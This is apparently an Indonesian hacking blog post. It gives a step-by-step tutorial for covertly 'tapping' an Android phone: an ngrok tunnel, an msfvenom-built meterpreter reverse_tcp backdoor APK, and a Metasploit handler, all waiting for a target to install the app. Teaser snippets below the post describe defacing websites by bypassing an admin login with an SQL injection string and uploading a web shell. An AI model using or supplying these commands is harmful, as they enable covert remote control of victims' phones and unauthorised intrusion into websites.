Langsung ke konten utama

Sadap Android Dengan Metasploit via Termux


Yo bosku,gak usah banyak cek cok ya, dah capek abis kerja di real life (duh jd curhat) :v langsung simak saja tutornya 😘 .Forwardingalian sudah menginstall metasploit dan ngrok ya boss karna di sini kita butuh ngrok buat port forwarding,jika belum kalian bisa cari di google :v latau ain kali saya akan memposting di artikel selanjutnya.


  1. [pertama]
    aktifkan ngrokmu : ketik  ./ngrok tcp 1945 (1945 hanya contoh kalian bisa ganti sesuka hati)
    Image

    [kedua] 
    buat dulu backdoornya boss,buka termuxmu dan masuk di dir/folder mana kamu pengen nempatin backdoornya contoh : cd /sdcard/demo
    kemudian ketik : msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10637 R > backdoor.apk (0.tcp.ngrok.io isi dengan ip yg di ngrok,10362 isi dengan port yang ada di ngrok) [next]
    [ketiga]
    jalankan metasploitmu kalo sudah terbuka
    ketik : use exploit/multi/handler
    ketik : set payload android/meterpreter/reverse_tcp
    ketik : set Lhost localhost
    ketik : set Lport 1945 (karna td ane menggunakan tcp 1945 sa'at menjalankan ngrok)
    ketik : run atau exploit 
    Image


     
  2. selesai dah tinggal tunggu target install dan membuka backdoornya
    jika target sudah membuka backdoornya ada notif di metasploit meterpreter session 1 opened

    sadap android
    secreenshotnya boss
    Nah buat lihat semua command yang bisa di gunakan tinggal ketik help

Komentar

Postingan populer dari blog ini

Garuda Webscan | Simple Tool Information Gathering

Hai bwank! Kali ini saya akan membagikan tool dari member Garuda Security Hacker yaitu Yoshieiciro_01. Oke langsung saja kita ke fitur fiturnya : 1) Services Scanner 2) Domain Name Server (DNS) Scanner 3) Subdomain Scanner 4) Hidden Files/Directories 5) Vulnerabilities Scanner Gud kan fiturnya? kuyy install lgsg coeg:v Cara install : 1. git clone  https://github.com/Yoshieichiro01/Garuda-WebScan.git 2. cd Garuda-WebScan 3. chmod 777 install.sh 4. chmod 777 Garuda-WebScan.sh 5. ./install.sh 6. ./Garuda-WebScan.sh 7. langsung sikatt Thanks To :  Garuda Security Hacker

Deface Bypass Admin Upload Shell | Fresh Dork

Nih gua jelasin  Deface  adalah suatu teknik mengganti atau menyisipkan file pada pada server, Teknik ini bisa di lakukan karena terdapat lubang atau celah pada system scurity yang ada pada website. Oleh karena itu gw tidak tanggung jawab atas semua yang lu lakukan :v Nah udah tau penjelasanya yaudah kita langsung tutorialnya : Bahan : Dork : Sedot   disini Script deface bisa lu sedot  disini Shell backdoor bisa lu download  disini Untuk dorking berbagai negara disini Dorking  di google terus pilih salah satu  site , di tahap ini membutuhkan kesabaran karena tidak semua site  vuln  cobalah terus mencari dengan mengembangkan dorknya . Nah sekarang kita masuk di admin loginya, coba kita  bypass  dengan u/p  '=''or' Kalo  vuln  maka akan masuk ke  dashboard  kalo tidak cari yang lain, nah sekarang gw udah masuk dashboard nih Sekarang tinggal  upload shell  nya, cari tempat upload terserah mau dimana sekarang gw nemu te